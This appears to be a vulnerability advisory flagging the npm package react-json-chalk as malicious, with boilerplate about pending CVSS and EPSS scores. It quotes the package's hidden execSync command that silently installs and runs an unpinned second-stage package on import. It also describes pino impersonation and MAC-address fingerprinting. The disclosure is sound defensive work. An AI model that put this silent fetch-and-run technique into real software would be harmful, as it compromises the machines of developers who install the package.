Vulnerability
Malicious code in react-json-chalk (npm)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (1a2b0f9e236c71a3da2c36dd19a90a0a3e096503e79754d25ce2a13eb5d72d77) The package is published as `react-json-chalk` but its `main` entry (`pino.js`) impersonates the pino logger (homepage `https://getpino.io`, bundled pino source tree, misappropriated description). On `require('react-json-chalk')`, `pino.js` immediately loads `lib/writer.js`, which at module top level tries `require('react-pinojs')` and, if absent, executes `child_process.execSync("npm install react-pinojs --no-warnings --no-save --no-progress --loglevel silent")` and then `require('../../react-pinojs/pino.js')`. The flags suppress install output and avoid persisting the dependency in package.json, so consumers get no visible signal that a second package was fetched. The fetched dependency is unpinned, fully controlled by whoever publishes `react-pinojs`, and its code runs as part of the require() of this package — arbitrary attacker code on the installer's machine on every import. The same `lib/writer.js` defines `getMacAddress()` which enumerates non-internal IPv4 interface MAC addresses, consistent with host fingerprinting handed off to the second stage. The package name/contents mismatch (logger source tree under an unrelated name) is also a namespace-abuse / pino-impersonation pattern.
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile (lower panel). Re-check this CVE after one cron tick — the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence